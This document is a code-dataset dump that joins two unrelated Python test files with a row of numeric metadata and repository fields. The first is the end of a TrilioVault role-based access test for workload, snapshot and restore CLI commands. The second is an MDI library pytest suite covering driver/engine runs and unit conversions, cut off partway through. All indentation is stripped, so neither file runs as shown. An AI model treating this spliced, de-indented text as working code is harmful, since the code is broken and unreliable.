self.delete_vm(self.instances_id[0])
LOG.debug("Instance deleted successfully for restore")
#Delete corresponding volume
self.delete_volume(self.volumes_id)
LOG.debug("Volume deleted successfully for restore")
#Create one-click restore using CLI command by backup role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Execute snapshot-oneclick-restore command by backup role", tvaultconf.FAIL)
raise Exception("Command one-click restore did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot-oneclick-restore command by backup role", tvaultconf.PASS)
LOG.debug("Command one-click restore executed correctly backup role")
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
self.restore_id1 = query_data.get_snapshot_restore_id(self.snapshot_id1)
LOG.debug("Restore ID: " + str(self.restore_id1))
self.restore_vm_id1 = self.get_restored_vm_list(self.restore_id1)
LOG.debug("Restore VM ID: " + str(self.restore_vm_id1))
self.restore_volume_id1 = self.get_restored_volume_list(self.restore_id1)
LOG.debug("Restore Volume ID: " + str(self.restore_volume_id1))
# Use admin credentials
os.environ['OS_USERNAME']= CONF.identity.username
os.environ['OS_PASSWORD']= CONF.identity.password
# Create workload with CLI by admin role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.restore_vm_id1)
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("Command workload_create did not execute correctly by admin role")
reporting.add_test_step("Can not execute workload_create command by admin role", tvaultconf.PASS)
else:
reporting.add_test_step("Command workload_create did not execute correctly by admin role", tvaultconf.FAIL)
raise Exception("Command workload_create executed correctly by admin role")
# Run snapshot_create CLI by admin role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
LOG.debug("snapshot_create command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_create command by admin role", tvaultconf.PASS)
LOG.debug("Command snapshot_create did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute snapshot_create command by admin role", tvaultconf.FAIL)
raise Exception("Command snapshot_create executed correctly by admin role")
#Create one-click restore using CLI command by admin role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Can not execute restore_create command by admin role", tvaultconf.PASS)
LOG.debug("Command restore_create did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute restore_create command by admin role", tvaultconf.FAIL)
raise Exception("Command restore_create executed correctly by admin role")
# Run restore_delete CLI by admin role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Can not execute restore_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command restore_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute restore_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command restore_delete executed correctly by admin role")
# Run snapshot_delete CLI by admin role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute snapshot_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete executed correctly by admin role")
# Delete workload with CLI by admin role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Can not execute workload_delete command by admin role", tvaultconf.PASS)
LOG.debug("Command workload_delete did not execute correctly by admin role")
else:
reporting.add_test_step("Can not execute workload_delete command by admin role", tvaultconf.FAIL)
raise Exception("Command workload_delete executed correctly by admin role")
# Use nonadmin credentials
os.environ['OS_USERNAME']= CONF.identity.nonadmin_user
os.environ['OS_PASSWORD']= CONF.identity.nonadmin_password
# Create workload with CLI by default role
workload_create = command_argument_string.workload_create + " --instance instance-id=" +str(self.restore_vm_id1)
rc = cli_parser.cli_returncode(workload_create)
if rc != 0:
LOG.debug("Command workload_create did not execute correctly by default role")
reporting.add_test_step("Can not execute workload_create command by default role", tvaultconf.PASS)
else:
reporting.add_test_step("Can not execute workload_create command by default role", tvaultconf.FAIL)
raise Exception("Command workload_create executed correctly by default role")
# Run snapshot_create CLI by default role
snapshot_create = command_argument_string.snapshot_create + str(self.wid1)
rc = cli_parser.cli_returncode(snapshot_create)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_create command by default role", tvaultconf.PASS)
LOG.debug("Command snapshot_create did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute snapshot_create command by default role", tvaultconf.FAIL)
raise Exception("Command snapshot_create executed correctly by default role")
# Create one-click restore using CLI by default role
restore_command = command_argument_string.oneclick_restore + " " + str(self.snapshot_id1)
rc = cli_parser.cli_returncode(restore_command)
if rc != 0:
reporting.add_test_step("Can not execute restore_create command by default role", tvaultconf.PASS)
LOG.debug("Command restore_create did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute restore_create command by default role", tvaultconf.FAIL)
raise Exception("Command restore_create executed correctly by default role")
# Run restore_delete CLI by default role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Can not execute restore_delete command by default role", tvaultconf.PASS)
LOG.debug("Command restore_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute restore_delete command by default role", tvaultconf.FAIL)
raise Exception("Command restore_delete executed correctly by default role")
# Run snapshot_delete CLI by default role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
LOG.debug("snapshot_delete command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Can not execute snapshot_delete command by default role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute snapshot_delete command by default role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete executed correctly by default role")
# Delete workload with CLI by default role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Can not execute workload_delete command by default role", tvaultconf.PASS)
LOG.debug("Command workload_delete did not execute correctly by default role")
else:
reporting.add_test_step("Can not execute workload_delete command by default role", tvaultconf.FAIL)
raise Exception("Command workload_delete executed correctly by default role")
# Use backupuser credentials
os.environ['OS_USERNAME']= CONF.identity.backupuser
os.environ['OS_PASSWORD']= CONF.identity.backupuser_password
# Run restore_delete CLI by backup role
restore_delete = command_argument_string.restore_delete + str(self.restore_id1)
rc = cli_parser.cli_returncode(restore_delete)
if rc != 0:
reporting.add_test_step("Execute restore_delete command by backup role", tvaultconf.FAIL)
raise Exception("Command restore_delete did not execute correctly by backup role")
else:
reporting.add_test_step("Execute restore_delete command by backup role", tvaultconf.PASS)
LOG.debug("Command restore_delete executed correctly by backup role")
wc = self.wait_for_snapshot_tobe_available(self.wid1, self.snapshot_id1)
#Delete restored VM instance and volume
self.delete_restored_vms(self.restore_vm_id1, self.restore_volume_id1)
LOG.debug("Restored VMs deleted successfully by backup role")
# Run snapshot_delete CLI by backup role
snapshot_delete = command_argument_string.snapshot_delete + str(self.snapshot_id1)
LOG.debug("snapshot_delete command: " + str(snapshot_create))
rc = cli_parser.cli_returncode(snapshot_delete)
if rc != 0:
reporting.add_test_step("Execute snapshot_delete command by backup role", tvaultconf.FAIL)
raise Exception("Command snapshot_delete did not execute correctly by backup role")
else:
reporting.add_test_step("Execute snapshot_delete command by backup role", tvaultconf.PASS)
LOG.debug("Command snapshot_delete executed correctly by backup role")
workload_available = self.wait_for_workload_tobe_available(self.wid1)
# Delete workload with CLI by backup role
workload_delete = command_argument_string.workload_delete + str(self.wid1)
rc = cli_parser.cli_returncode(workload_delete)
if rc != 0:
reporting.add_test_step("Execute workload_delete command by backup role", tvaultconf.FAIL)
raise Exception ("RBAC policy fails for workload deletion by backup role")
else:
LOG.debug("Workload deleted successfully by backup role")
reporting.add_test_step("Execute workload_delete command by backup role", tvaultconf.PASS)
reporting.test_case_to_write()
except Exception as e:
LOG.error("Exception: " + str(e))
reporting.set_test_script_status(tvaultconf.FAIL)
reporting.test_case_to_write()
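# Each block in the test above repeats the same run-CLI / check-returncode /
# report pattern. A hypothetical helper (sketch, assuming the same cli_parser,
# reporting and tvaultconf modules) that the test body could call instead:
#
#   def _expect_cli(command, step, should_succeed):
#       succeeded = (cli_parser.cli_returncode(command) == 0)
#       if succeeded == should_succeed:
#           reporting.add_test_step(step, tvaultconf.PASS)
#       else:
#           reporting.add_test_step(step, tvaultconf.FAIL)
#           raise Exception("Unexpected CLI result for: " + step)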
| 57.420863 | 124 | 0.687966 | 1,987 | 15,963 | 5.312531 | 0.08002 | 0.037893 | 0.054566 | 0.066313 | 0.837249 | 0.81385 | 0.770273 | 0.712202 | 0.68956 | 0.683308 | 0 | 0.00694 | 0.241809 | 15,963 | 277 | 125 | 57.628159 | 0.86524 | 0.064963 | 0 | 0.396313 | 0 | 0 | 0.304826 | 0.005773 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.101382 | 0.0553 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
49e8176df4e3a50d5eb972b036da94008135514d | 39,825 | py | Python | ELECTRIC/mdi/tests/test_mdi.py | janash/ELECTRIC | 007819cebdb26a27e706af68922721ddd5fe4a1a | ["BSD-3-Clause"] | null | null | null | ELECTRIC/mdi/tests/test_mdi.py | janash/ELECTRIC | 007819cebdb26a27e706af68922721ddd5fe4a1a | ["BSD-3-Clause"] | null | null | null | ELECTRIC/mdi/tests/test_mdi.py | janash/ELECTRIC | 007819cebdb26a27e706af68922721ddd5fe4a1a | ["BSD-3-Clause"] | null | null | null |
import os
import sys
import glob
import subprocess
import pytest
try: # Check for local build
sys.path.append('../build')
import MDI_Library as mdi
except ImportError: # Check for installed package
import mdi
build_dir = "../build"
sys.path.append(build_dir)
driver_out_expected_f90 = """ Engine name: MM
NNODES: 2
NODE: @FORCES
NCOMMANDS: 3
COMMAND: >FORCES
NCALLBACKS: 1
CALLBACK: >FORCES
"""
# Output expected from each of the drivers
driver_out_expected_py = """ Engine name: MM
NNODES: 2
NODE: @FORCES
NCOMMANDS: 3
COMMAND: >FORCES
NCALLBACKS: 1
CALLBACK: >FORCES
NATOMS: 10
COORDS: [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9]
FORCES: [0.0, 0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16, 0.17, 0.18, 0.19, 0.2, 0.21, 0.22, 0.23, 0.24, 0.25, 0.26, 0.27, 0.28, 0.29]
"""
# Includes flags to prevent warning messages
mpiexec_general = "mpiexec "
mpiexec_mca = "mpiexec --mca btl_base_warn_component_unused 0 "
def format_return(input_string):
my_string = input_string.decode('utf-8')
# remove any \r special characters, which sometimes are added on Windows
my_string = my_string.replace('\r','')
return my_string
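# For example, format_return(b" Engine name: MM\r\n") returns
# " Engine name: MM\n"; every test below funnels subprocess output through
# this helper before comparing against the expected strings.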
##########################
# LIBRARY Method #
##########################
def test_cxx_cxx_lib():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_lib_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_f90_lib():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_lib_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_py_py_lib():
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/lib_py.py", "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected = '''Start of driver
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
NATOMS: 10
'''
assert driver_err == ""
assert driver_out == expected
def test_py_py_lib_mpi():
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","2",sys.executable, "../build/lib_py.py", "-mdi", "-role DRIVER -name driver -method LIB"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
expected = '''Start of driver
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
NATOMS: 10
NATOMS: 20
'''
assert driver_err == ""
assert driver_out == expected
##########################
# MPI Method #
##########################
def test_cxx_cxx_mpi():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_out == " Engine name: MM\n"
assert driver_err == ""
def test_cxx_f90_mpi():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_py_mpi():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_cxx_mpi():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_f90_mpi():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_py_mpi():
global driver_out_expected_f90
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",driver_name, "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_py_cxx_mpi():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_f90_mpi():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",engine_name,"-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_py_mpi():
global driver_out_expected_py
# run the calculation
driver_proc = subprocess.Popen(["mpiexec","-n","1",sys.executable,"driver_py.py", "-mdi", "-role DRIVER -name driver -method MPI",":",
"-n","1",sys.executable,"engine_py.py","-mdi","-role ENGINE -name MM -method MPI"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
driver_tup = driver_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
##########################
# TCP Method #
##########################
def test_cxx_cxx_tcp():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_f90_tcp():
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_cxx_py_tcp():
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == " Engine name: MM\n"
def test_f90_cxx_tcp():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_f90_tcp():
global driver_out_expected_f90
# get the names of the driver and engine codes, which include a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_f90_py_tcp():
global driver_out_expected_f90
# get the name of the driver code, which includes a .exe extension on Windows
driver_name = glob.glob("../build/driver_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([driver_name, "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_f90
def test_py_cxx_tcp():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_cxx*")[0]
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_f90_tcp():
global driver_out_expected_py
# get the name of the engine code, which includes a .exe extension on Windows
engine_name = glob.glob("../build/engine_f90*")[0]
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([engine_name, "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"])
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
def test_py_py_tcp():
global driver_out_expected_py
# run the calculation
driver_proc = subprocess.Popen([sys.executable, "../build/driver_py.py", "-mdi", "-role DRIVER -name driver -method TCP -port 8021"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=build_dir)
engine_proc = subprocess.Popen([sys.executable, "../build/engine_py.py", "-mdi", "-role ENGINE -name MM -method TCP -port 8021 -hostname localhost"],
cwd=build_dir)
driver_tup = driver_proc.communicate()
engine_proc.communicate()
# convert the driver's output into a string
driver_out = format_return(driver_tup[0])
driver_err = format_return(driver_tup[1])
assert driver_err == ""
assert driver_out == driver_out_expected_py
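# The LIB/MPI/TCP tests above repeat one body per (driver language,
# engine language) pair. A hypothetical pytest.mark.parametrize sketch,
# assuming the same ../build glob patterns:
#
#   @pytest.mark.parametrize("driver,engine",
#                            [("cxx", "cxx"), ("cxx", "f90"),
#                             ("f90", "cxx"), ("f90", "f90")])
#   def test_tcp(driver, engine):
#       driver_name = glob.glob("../build/driver_%s*" % driver)[0]
#       engine_name = glob.glob("../build/engine_%s*" % engine)[0]
#       # launch both processes and assert on the output, as above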
##########################
# Unit Conversions Tests #
##########################
def test_unit_conversions_py():
# Test all charge conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_charge", "atomic_unit_of_charge") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_charge", "coulomb") == pytest.approx(1.6021766208e-19)
assert mdi.MDI_Conversion_Factor("coulomb", "atomic_unit_of_charge") == pytest.approx(1.0 / 1.6021766208e-19)
assert mdi.MDI_Conversion_Factor("coulomb", "coulomb") == pytest.approx(1.0)
# Test some energy conversions
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "atomic_unit_of_energy") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "calorie") == pytest.approx(1.0420039967034203e-18)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "electron_volt") == pytest.approx(27.211386245988066)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "hartree") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "inverse_meter_energy") == pytest.approx(21947463.136319984)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "joule") == pytest.approx(4.35974465e-18)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kelvin_energy") == pytest.approx(315775.02480406954)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilocalorie") == pytest.approx(1.0420039967034203e-21)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilocalorie_per_mol") == pytest.approx(627.5094737775374)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilojoule") == pytest.approx(4.3597446499999996e-21)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "kilojoule_per_mol") == pytest.approx(2625.4996382852164)
assert mdi.MDI_Conversion_Factor("atomic_unit_of_energy", "rydberg") == pytest.approx(2.0)
assert mdi.MDI_Conversion_Factor("calorie", "atomic_unit_of_energy") == pytest.approx(1.0 / 1.0420039967034203e-18)
assert mdi.MDI_Conversion_Factor("electron_volt", "atomic_unit_of_energy") == pytest.approx(1.0 / 27.211386245988066)
assert mdi.MDI_Conversion_Factor("hartree", "atomic_unit_of_energy") == pytest.approx(1.0)
assert mdi.MDI_Conversion_Factor("inverse_meter_energy", "atomic_unit_of_energy") == pytest.approx(1.0 / 21947463.136319984)
assert mdi.MDI_Conversion_Factor("joule", "atomic_unit_of_energy") == pytest.approx(1.0 / 4.35974465e-18)
assert mdi.MDI_Conversion_Factor("kelvin_energy", "atomic_unit_of_energy") == pytest.approx(1.0 / 315775.02480406954)
assert mdi.MDI_Conversion_Factor("kilocalorie", "atomic_unit_of_energy") == pytest.approx(1.0 / 1.0420039967034203e-21)
assert mdi.MDI_Conversion_Factor("kilocalorie_per_mol", "atomic_unit_of_energy") == pytest.approx(1.0 / 627.5094737775374)
assert mdi.MDI_Conversion_Factor("kilojoule", "atomic_unit_of_energy") == pytest.approx(1.0 / 4.3597446499999996e-21)
